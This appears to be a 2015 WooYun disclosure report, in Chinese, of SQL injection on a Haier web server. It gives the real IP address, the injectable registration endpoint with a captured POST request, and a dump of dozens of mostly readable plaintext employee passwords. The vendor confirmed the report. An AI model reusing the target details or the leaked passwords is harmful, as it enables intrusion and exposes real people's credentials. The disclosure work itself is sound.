当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102621

漏洞标题:海尔某站两处SQL注入+大量明文密码(可内网渗透)

相关厂商:海尔集团

漏洞作者: 岩少

提交时间:2015-03-23 09:50

修复时间:2015-05-07 14:54

公开时间:2015-05-07 14:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-23: 细节已通知厂商并且等待厂商处理中
2015-03-23: 厂商已经确认,细节仅向厂商公开
2015-04-02: 细节向核心白帽子及相关领域专家公开
2015-04-12: 细节向普通白帽子公开
2015-04-22: 细节向实习白帽子公开
2015-05-07: 细节向公众公开

简要描述:

RT

详细说明:

某站存在SQL注入漏洞
地址:http://27.223.70.11/register.asp
在这抓包。

1.png


POST参数如下:

POST /reg_success.asp HTTP/1.1
Host: 27.223.70.11
Proxy-Connection: keep-alive
Content-Length: 168
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://27.223.70.11
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://27.223.70.11/register.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDQCCQRQDS=IDDLEKOBGMPCMBCFOIHDDLOD
userid=ceshi115656&password=123456&pwd=123456&bumen=%C0%E4%B9%F1%BF%AA%B7%A2%B2%BF&name=admin&phone=13793092533&email=123654%40qq.com&leibie=1&Submit=%CC%E1%BD%BB


2.png


3.png


mask 区域
*****ode*****
*****ntr*****
*****+-----------*****
*****| password *****
*****+-----------*****
*****| Haier21508*****
*****| 88932681 *****
*****| Lijing1 *****
*****| Pro2013.10*****
*****| Haier,123 *****
*****| Haier20130*****
*****| Wangdq1411*****
*****| u101804b *****
*****| Qc..2015 *****
*****| scm5958 *****
*****| 123456 *****
*****| @Cortex_m4*****
*****| xyjbzh *****
*****| haier,123 *****
*****| paul213001*****
*****| 123456 *****
*****| Haier,123 *****
*****| Libin456 *****
*****| ywq,2014 *****
*****| 126920 *****
*****| 88936024 *****
*****| xf201408. *****
*****| Haier.1304*****
*****| Liyin1304 *****
*****| Haier;1227*****
*****| Sun.1110 *****
*****| Haier;1227*****
*****| 19850916 *****
*****| Haier.0412*****
*****| Haier00720*****
*****| Czl911914 *****
*****| 2013May02 *****
*****| Haier321 *****
*****| 871010 *****
*****| Haier,123 *****
*****| XUE.830715*****
*****| 2013Sixsix*****
*****| Haier333 *****
*****| Yrui1991 *****
*****| Haier111 *****
*****| Haier3412 *****
*****| Haier.08 *****
*****| Haier20140*****
*****| Haier.07 *****
*****| Zyx6522156*****
*****| 323323 *****
*****| Ljl963852 *****
*****| gbf,1405 *****
*****| xieman.03 *****
*****| 448973063w*****
*****| 111111 *****
*****| Haier3696 *****
*****| Dyc1991010*****
*****| 201314 *****
*****| Tomse123 *****
*****| Zcw!3599 *****
*****| Haier12345*****
*****| wangxu1234*****
*****| 123456 *****
*****| mrv200705 *****
*****| bxkfb123 *****
*****| Haier.2012*****
*****+-----------*****
*****cod*****


漏洞证明:

2.png


3.png


修复方案:

参数过滤。

版权声明:转载请注明来源 岩少@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-03-23 14:53

厂商回复:

谢乌云平台白帽子的测试与提醒,我方已安排人员进行处理

最新状态:

暂无


漏洞评价:

评论

  1. 2015-03-23 12:21 | 岩少 ( 普通白帽子 | Rank:586 漏洞数:171 | 破晓团队)

    @疯狗 求审核http://www.wooyun.org/bugs/wooyun-2015-0102966/trace/a23c6bde29beb3bebb33a29ad3a4e439

  2. 2015-03-23 15:10 | 岩少 ( 普通白帽子 | Rank:586 漏洞数:171 | 破晓团队)

    @疯狗 @海尔集团 这个给了4Rank。。@